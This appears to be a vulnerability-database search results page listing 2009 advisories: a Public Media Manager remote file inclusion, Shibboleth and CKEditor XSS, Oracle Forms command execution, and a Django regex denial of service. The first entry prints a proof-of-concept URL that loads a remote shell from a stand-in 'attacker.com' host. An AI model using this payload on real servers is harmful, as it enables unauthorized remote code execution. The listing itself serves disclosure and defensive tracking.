8086 matches found

Exploit DB
added 2009/12/01 12:0 a.m. | 23 views

Public Media Manager - Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Public Media Manager PoC : http://server/path/comcal/calmenu.php?formsdir=http://attacker.com/shell.txt?cmd 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...

AI score: 7.4 | Exploits: 0

seebug.org
added 2009/12/01 12:0 a.m. | 8 views

Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Public Media Manager = 1.3 formsdir Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/pmm-cms/files/ Dork : die"Lamers attempt"; :D Vuln : ./pmm-cms-1.3/comcal/calmenu.php line 4...

AI score: 7.1 | Exploits: 0

NVD
added 2009/11/06 3:30 p.m. | 10 views

CVE-2009-3300

Multiple cross-site scripting (XSS) vulnerabilities in the Identity Provider (IdP) 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

CVSS: 2.6 | AI score: 5.6 | EPSS: 0.0032 | Exploits: 0 | References: 5

UbuntuCve
added 2009/11/06 3:30 p.m. | 15 views

CVE-2009-3300

Multiple cross-site scripting (XSS) vulnerabilities in the Identity Provider (IdP) 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

CVSS: 2.6 | AI score: 5.9 | EPSS: 0.0032 | Exploits: 0 | References: 1

OSV
added 2009/11/06 3:30 p.m. | 1 views

DEBIAN-CVE-2009-3300

Multiple cross-site scripting (XSS) vulnerabilities in the Identity Provider (IdP) 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

CVSS: 2.6 | AI score: 5.9 | EPSS: 0.0032 | Exploits: 0 | References: 1

Cvelist
added 2009/11/06 3:0 p.m. | 14 views

CVE-2009-3300

Multiple cross-site scripting (XSS) vulnerabilities in the Identity Provider (IdP) 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

AI score: 5.6 | EPSS: 0.0032 | Exploits: 0 | References: 5

Debian CVE
added 2009/11/06 3:0 p.m. | 18 views

CVE-2009-3300

Multiple cross-site scripting (XSS) vulnerabilities in the Identity Provider (IdP) 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via...

CVSS: 2.6 | AI score: 5.6 | EPSS: 0.0032 | Exploits: 0

Check Point Advisories
added 2009/11/01 12:0 a.m. | 1 views

Oracle Application Server Forms Arbitrary System Command Execution (CVE-2005-2372)

Oracle Application Server is a multi-platform solution for developing and deploying enterprise applications and web sites. The server ships with several additional components that extend its functionality. One of such component is the Oracle Forms Services. The Forms Services component allows for...

CVSS: 7.2 | AI score: 7.1 | EPSS: 0.02589 | Exploits: 1

Tenable Nessus
added 2009/10/16 12:0 a.m. | 14 views

Fedora 10 : Django-1.1.1-1.fc10 (2009-10432)

http://www.djangoproject.com/weblog/2009/oct/09/security/ Description of vulnerability ============================ Django's forms library included field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological...

AI score: 5.5 | Exploits: 0 | References: 3

Tenable Nessus
added 2009/10/16 12:0 a.m. | 10 views

Fedora 11 : Django-1.1.1-1.fc11 (2009-10390)

http://www.djangoproject.com/weblog/2009/oct/09/security/ Description of vulnerability ============================ Django's forms library included field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological...

AI score: 5.5 | Exploits: 0 | References: 3

NVD
added 2009/10/13 10:30 a.m. | 18 views

CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular...

CVSS: 5 | AI score: 6.3 | EPSS: 0.06201 | Exploits: 0 | References: 10

Prion
added 2009/10/13 10:30 a.m. | 11 views

Design/Logic Flaw

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular...

CVSS: 5 | AI score: 6.6 | EPSS: 0.06201 | Exploits: 0 | References: 10 | Affected Software: 1

OSV
added 2009/10/13 10:30 a.m. | 2 views

CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular...

AI score: 6.3 | Exploits: 0 | References: 12

PyPA
added 2009/10/13 10:30 a.m. | 6 views

PYSEC-2009-4

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular...

CVSS: 5 | AI score: 6.7 | EPSS: 0.06201 | Exploits: 0 | References: 10 | Affected Software: 1

OSV
added 2009/10/13 10:30 a.m. | 2 views

DEBIAN-CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular...

CVSS: 5 | AI score: 6.7 | EPSS: 0.06201 | Exploits: 0 | References: 1

UbuntuCve
added 2009/10/13 10:30 a.m. | 17 views

CVE-2009-3695

Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular...

CVSS: 5 | AI score: 5.9 | EPSS: 0.06201 | Exploits: 0 | References: 1

CVE
added 2009/10/13 10:0 a.m. | 82 views

CVE-2009-3695

This CVE covers the Django forms library vulnerability where the regex used to validate EmailField and URLField can backtrack excessively, causing high CPU and potential denial of service. Affected versions are Django 1.0 before 1.0.4 and 1.1 before 1.1.1. The issue stems from algorithmic complex...

CVSS: 5 | AI score: 6.2 | EPSS: 0.06201 | Exploits: 0 | References: 10 | Affected Software: 1

OSV
added 2009/10/10 12:0 a.m. | 9 views

DSA-1905-1 python-django - denial of service

Bulletin has no description...

CVSS: 5 | AI score: 6.3 | EPSS: 0.06201 | Exploits: 0

FreeBSD
added 2009/10/09 12:0 a.m. | 28 views

django -- denial-of-service attack

Django project reports: Django's forms library includes field types which perform regular-expression-based validation of email addresses and URLs. Certain addresses/URLs could trigger a pathological performance case in these regular expression, resulting in the server process/thread becoming...

CVSS: 5 | AI score: 6.4 | EPSS: 0.06201 | Exploits: 0 | References: 1

securityvulns
added 2009/09/28 12:0 a.m. | 179 views

XSS and Content Spoofing vulnerabilities in CKEditor

Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test"...

Exploits: 0